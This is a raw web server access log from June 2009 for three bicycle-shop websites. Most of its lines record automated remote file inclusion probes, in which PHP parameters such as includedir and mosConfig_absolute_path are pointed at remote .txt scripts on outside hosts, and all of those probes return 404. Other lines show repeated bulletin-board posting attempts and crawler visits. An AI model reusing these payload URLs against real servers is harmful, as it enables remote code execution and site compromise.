209.25.195.93 - - [09/Jun/2009:23:11:48 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
209.25.195.93 - - [09/Jun/2009:23:11:48 -0700] "GET /translations/tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
209.25.195.93 - - [09/Jun/2009:23:11:48 -0700] "GET /translations/English-US.txt/tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
209.25.195.93 - - [09/Jun/2009:23:11:48 -0700] "GET /translations/Finnish.txt/tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
209.25.195.93 - - [09/Jun/2009:23:11:51 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
209.25.195.93 - - [09/Jun/2009:23:11:51 -0700] "GET /translations/English-US.txt/tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
209.25.195.93 - - [09/Jun/2009:23:11:51 -0700] "GET /translations/Finnish.txt/tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
209.25.195.93 - - [09/Jun/2009:23:11:51 -0700] "GET /translations/tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
209.25.195.93 - - [09/Jun/2009:23:11:52 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
209.25.195.93 - - [09/Jun/2009:23:11:56 -0700] "GET /translations/tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
209.25.195.93 - - [09/Jun/2009:23:11:56 -0700] "GET /translations/Portuguese_BR.txt/tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
91.121.150.170 - - [09/Jun/2009:23:18:28 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 518 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
209.25.195.93 - - [09/Jun/2009:23:19:43 -0700] "GET /translations/Finnish.txt/tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
209.25.195.93 - - [09/Jun/2009:23:19:43 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
209.25.195.93 - - [09/Jun/2009:23:19:43 -0700] "GET /translations/tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
209.25.195.93 - - [09/Jun/2009:23:19:49 -0700] "GET /translations/Spanish.txt/tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
209.25.195.93 - - [09/Jun/2009:23:20:21 -0700] "GET /translations/Swedish.txt/tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.30.79.51 - - [09/Jun/2009:23:20:22 -0700] "GET /bullitinboard/viewtopic.php?p=15843 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
91.121.150.170 - - [09/Jun/2009:23:21:13 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [09/Jun/2009:23:27:35 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
83.133.127.59 - - [09/Jun/2009:23:29:29 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [09/Jun/2009:23:30:21 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 518 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [09/Jun/2009:23:35:12 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
211.189.18.73 - - [09/Jun/2009:23:48:16 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [09/Jun/2009:23:48:16 -0700] "GET /translations/Czech.txt%20%20///tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [09/Jun/2009:23:48:16 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [09/Jun/2009:23:48:16 -0700] "GET /translations///tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [09/Jun/2009:23:48:16 -0700] "GET /translations///tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [09/Jun/2009:23:48:16 -0700] "GET /translations/Czech.txt%20%20///tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [09/Jun/2009:23:48:16 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [09/Jun/2009:23:48:17 -0700] "GET /translations///tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [09/Jun/2009:23:48:17 -0700] "GET /translations/Czech.txt%20%20///tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [09/Jun/2009:23:48:17 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [09/Jun/2009:23:48:17 -0700] "GET /translations///tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [09/Jun/2009:23:48:17 -0700] "GET /translations/Czech.txt%20%20///tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [09/Jun/2009:23:48:47 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [09/Jun/2009:23:48:47 -0700] "GET /translations///tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [09/Jun/2009:23:48:47 -0700] "GET /translations/Czech.txt///tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [09/Jun/2009:23:49:25 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [09/Jun/2009:23:49:25 -0700] "GET /translations///tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [09/Jun/2009:23:49:25 -0700] "GET /translations/Czech.txt///tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [09/Jun/2009:23:52:25 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
65.55.106.132 - - [09/Jun/2009:23:58:28 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jun/2009:00:01:22 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
119.63.193.75 - - [10/Jun/2009:00:07:20 -0700] "GET /bullitinboard/viewtopic.php HTTP/1.1" 200 128 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
119.63.193.75 - - [10/Jun/2009:00:09:25 -0700] "GET /bullitinboard/viewtopic.php?p=14714 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
211.189.18.73 - - [10/Jun/2009:00:09:57 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [10/Jun/2009:00:09:57 -0700] "GET /translations///tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [10/Jun/2009:00:09:57 -0700] "GET /translations/Spanish.txt///tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [10/Jun/2009:00:10:03 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [10/Jun/2009:00:10:03 -0700] "GET /translations///tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [10/Jun/2009:00:10:03 -0700] "GET /translations/Spanish.txt///tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
119.63.193.63 - - [10/Jun/2009:00:10:05 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jun/2009:00:15:33 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
91.121.150.170 - - [10/Jun/2009:00:23:36 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
122.153.212.195 - - [10/Jun/2009:00:27:04 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.collegedalfred.ca/upload/documents/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
122.153.212.195 - - [10/Jun/2009:00:27:05 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.collegedalfred.ca/upload/documents/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
91.121.150.170 - - [10/Jun/2009:00:36:17 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jun/2009:00:45:14 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
58.61.164.40 - - [10/Jun/2009:00:48:41 -0700] "GET / HTTP/1.1" 200 1764 "http://houstonbikeshop.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "houstonbikeshop.com"
196.40.10.246 - - [10/Jun/2009:00:50:27 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://houstonbikeshop.com/bullitinboard/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "houstonbikeshop.com"
196.40.10.246 - - [10/Jun/2009:00:50:28 -0700] "GET / HTTP/1.0" 200 1748 "http://houstonbikeshop.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "houstonbikeshop.com"
196.40.10.246 - - [10/Jun/2009:00:50:28 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://houstonbikeshop.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "houstonbikeshop.com"
208.80.195.38 - - [10/Jun/2009:00:50:35 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; DOJ3jx7bf; .NET CLR 1.1.4322)" "svbikes.com"
58.61.164.141 - - [10/Jun/2009:00:57:00 -0700] "GET / HTTP/1.1" 200 1764 "http://houstonbikeshop.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "houstonbikeshop.com"
124.115.1.7 - - [10/Jun/2009:01:00:01 -0700] "GET / HTTP/1.1" 200 1764 "http://houstonbikeshop.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "houstonbikeshop.com"
58.61.164.39 - - [10/Jun/2009:01:00:16 -0700] "GET / HTTP/1.1" 200 1764 "http://houstonbikeshop.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "houstonbikeshop.com"
211.189.18.73 - - [10/Jun/2009:01:02:39 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [10/Jun/2009:01:02:39 -0700] "GET /translations///tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [10/Jun/2009:01:02:39 -0700] "GET /translations/Finnish.txt///tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [10/Jun/2009:01:02:39 -0700] "GET /translations/Finnish.txt///tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [10/Jun/2009:01:02:39 -0700] "GET /translations///tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [10/Jun/2009:01:02:39 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
124.115.1.8 - - [10/Jun/2009:01:25:34 -0700] "GET / HTTP/1.1" 200 1764 "http://houstonbikeshop.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "houstonbikeshop.com"
58.61.164.140 - - [10/Jun/2009:01:27:29 -0700] "GET / HTTP/1.1" 200 1764 "http://houstonbikeshop.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "houstonbikeshop.com"
65.55.106.237 - - [10/Jun/2009:01:30:38 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
65.55.106.139 - - [10/Jun/2009:01:31:14 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
194.78.230.194 - - [10/Jun/2009:01:35:58 -0700] "GET /translations/Dutch.txt HTTP/1.0" 200 28744 "http://www.google.be/search?hl=nl&q=access%2Bpopup+tabel&btnG=Zoeken&meta=lr%3Dlang_nl" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "houstonbikeshop.com"
72.30.142.240 - - [10/Jun/2009:01:51:29 -0700] "GET /?M=A HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
222.236.47.188 - - [10/Jun/2009:01:56:48 -0700] "GET /skin/zero_vote/error.php?dir=http://geocities.com/afast.hazell/tools/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.47.188 - - [10/Jun/2009:01:56:48 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://geocities.com/afast.hazell/tools/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.47.188 - - [10/Jun/2009:01:56:48 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://geocities.com/afast.hazell/tools/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
81.196.124.252 - - [10/Jun/2009:01:57:06 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//back/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "bicyclestoreshouston.com"
81.196.124.252 - - [10/Jun/2009:01:57:06 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//back/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "bicyclestoreshouston.com"
81.196.124.252 - - [10/Jun/2009:01:57:19 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//back/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "houstonbikeshop.com"
81.196.124.252 - - [10/Jun/2009:01:57:20 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//back/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "houstonbikeshop.com"
72.30.142.240 - - [10/Jun/2009:01:57:53 -0700] "GET /logs/access_080610.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
218.249.36.194 - - [10/Jun/2009:02:00:32 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
218.249.36.194 - - [10/Jun/2009:02:00:32 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
218.249.36.194 - - [10/Jun/2009:02:00:35 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
208.80.195.45 - - [10/Jun/2009:02:00:38 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; Creative ZENcast v1.01.06)" "www.svbikes.com"
218.249.36.194 - - [10/Jun/2009:02:00:40 -0700] "GET /translations/Finnish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
218.249.36.194 - - [10/Jun/2009:02:01:42 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
218.249.36.194 - - [10/Jun/2009:02:01:42 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
218.249.36.194 - - [10/Jun/2009:02:01:45 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
218.249.36.194 - - [10/Jun/2009:02:01:50 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
218.249.36.194 - - [10/Jun/2009:02:01:58 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
218.249.36.194 - - [10/Jun/2009:02:01:58 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
218.249.36.194 - - [10/Jun/2009:02:07:13 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
218.249.36.194 - - [10/Jun/2009:02:07:13 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
218.249.36.194 - - [10/Jun/2009:02:07:13 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
218.249.36.194 - - [10/Jun/2009:02:07:18 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
218.249.36.194 - - [10/Jun/2009:02:07:24 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
218.249.36.194 - - [10/Jun/2009:02:07:24 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
218.249.36.194 - - [10/Jun/2009:02:07:27 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
218.249.36.194 - - [10/Jun/2009:02:07:29 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
218.249.36.194 - - [10/Jun/2009:02:07:46 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
218.249.36.194 - - [10/Jun/2009:02:07:51 -0700] "GET /translations/Finnish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
218.249.36.194 - - [10/Jun/2009:02:08:39 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.249.36.194 - - [10/Jun/2009:02:08:39 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.249.36.194 - - [10/Jun/2009:02:08:39 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.249.36.194 - - [10/Jun/2009:02:08:40 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.249.36.194 - - [10/Jun/2009:02:08:46 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.249.36.194 - - [10/Jun/2009:02:08:46 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.249.36.194 - - [10/Jun/2009:02:08:47 -0700] "GET /translations/Hungarian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.67.146 - - [10/Jun/2009:02:12:44 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.litana.ru/48e58559133e5ed1d37ebb57b6dd9b21/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "houstonbikeshop.com"
87.106.67.146 - - [10/Jun/2009:02:12:44 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.litana.ru/48e58559133e5ed1d37ebb57b6dd9b21/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "houstonbikeshop.com"
58.61.164.139 - - [10/Jun/2009:02:13:03 -0700] "GET / HTTP/1.1" 200 1764 "http://houstonbikeshop.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "houstonbikeshop.com"
